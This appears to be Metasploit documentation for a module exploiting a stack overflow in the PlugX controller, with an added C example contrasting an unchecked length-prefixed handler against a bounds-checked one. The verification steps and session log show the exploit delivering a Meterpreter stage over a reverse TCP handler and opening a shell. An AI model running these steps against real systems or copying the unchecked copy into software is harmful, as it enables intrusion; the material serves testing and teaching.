## Vulnerable Application

This module exploits a stack overflow in the Plug-X Controller when it handles a larger-than-expected message.

This vulnerability can allow remote code execution; however, it causes a pop-up message to be displayed on the target before execution is gained.
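
As an added illustration of the bug class the description names (this is not code from the module, from Metasploit, or from PlugX), here is a hypothetical length-prefixed message handler in C, first in the unchecked form that lets an oversized declared length overrun a fixed stack buffer, then with the bounds checks a defender would expect. The wire format, the 64-byte buffer, the return codes and the `scenario_*` helpers are all constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed wire format for this example (not PlugX's real protocol):
 * a 4-byte little-endian payload length followed by the payload bytes. */
#define HDR_LEN 4u
#define MAX_PAYLOAD 64u

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The defect class named in the module description: the sender-controlled
 * length is trusted and copied straight into a fixed-size stack buffer.
 * Shown for contrast only; nothing below calls it. */
int handle_message_unchecked(const uint8_t *msg, size_t msg_len) {
    uint8_t payload[MAX_PAYLOAD];
    if (msg_len < HDR_LEN) return -1;
    uint32_t declared = read_le32(msg);
    memcpy(payload, msg + HDR_LEN, declared);  /* stack overflow when declared > MAX_PAYLOAD */
    return (int)payload[0];
}

/* Hardened handler: the declared length is bounded by the buffer size and by
 * the bytes actually received before any copy happens.
 * Returns the payload length on success, -1 for a truncated header,
 * -2 for a declared length larger than the buffer, and -3 for a declared
 * length larger than what was actually received. */
int handle_message_checked(const uint8_t *msg, size_t msg_len) {
    uint8_t payload[MAX_PAYLOAD];
    if (msg_len < HDR_LEN) return -1;
    uint32_t declared = read_le32(msg);
    if (declared > MAX_PAYLOAD) return -2;
    if (declared > msg_len - HDR_LEN) return -3;
    memcpy(payload, msg + HDR_LEN, declared);
    return (int)declared;
}

/* Build a constructed message whose header claims `declared` bytes while
 * `actual` payload bytes really follow. Returns the total message length. */
size_t build_message(uint8_t *out, size_t out_cap, uint32_t declared, size_t actual) {
    if (out_cap < HDR_LEN + actual) return 0;
    out[0] = (uint8_t)(declared & 0xff);
    out[1] = (uint8_t)((declared >> 8) & 0xff);
    out[2] = (uint8_t)((declared >> 16) & 0xff);
    out[3] = (uint8_t)((declared >> 24) & 0xff);
    memset(out + HDR_LEN, 'A', actual);
    return HDR_LEN + actual;
}

/* Scenario helpers so each outcome is a checkable return value. */
int scenario_well_formed(void) {       /* 16 declared, 16 present -> 16 */
    uint8_t buf[256];
    size_t n = build_message(buf, sizeof buf, 16, 16);
    return handle_message_checked(buf, n);
}
int scenario_oversized(void) {         /* 200 declared, 200 present -> -2 */
    uint8_t buf[256];
    size_t n = build_message(buf, sizeof buf, 200, 200);
    return handle_message_checked(buf, n);
}
int scenario_lying_header(void) {      /* 32 declared, only 8 present -> -3 */
    uint8_t buf[256];
    size_t n = build_message(buf, sizeof buf, 32, 8);
    return handle_message_checked(buf, n);
}
int scenario_truncated(void) {         /* fewer than 4 bytes -> -1 */
    uint8_t buf[2] = {0x10, 0x00};
    return handle_message_checked(buf, sizeof buf);
}

int main(void) {
    printf("well-formed:  %d\n", scenario_well_formed());
    printf("oversized:    %d\n", scenario_oversized());
    printf("lying header: %d\n", scenario_lying_header());
    printf("truncated:    %d\n", scenario_truncated());
    return 0;
}
```

The two checks in `handle_message_checked` are deliberately separate: the first stops the declared length from exceeding the stack buffer, the second stops a header that claims more bytes than arrived from reading past the received data. A handler with only the first check is still an over-read, which is why both belong in front of the copy.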

A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)

## Verification

1. Run the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/plugx`
4. Do: `set rhost [ip]`
5. Do: `set target [target]`
6. Do: `exploit`
7. Click OK for the "PeDecodePacket" pop-up on the target
8. Get a shell

## Scenarios

### Windows XP SP3 with PlugX type 1

```
msf > use exploit/windows/misc/plugx
msf exploit(plugx) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > set verbose true
verbose => true
msf exploit(plugx) > exploit

[*] Started reverse TCP handler on 1.2.3.99:4444
[*] 1.2.3.4:13579 - Trying target PlugX Type I...
[*] 1.2.3.4:13579 - waiting for response
[*] Sending stage (956991 bytes) to 1.2.3.4
[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
[*] 1.2.3.4:13579 - Server closed connection

meterpreter > getuid
Server username: WINXP\user
```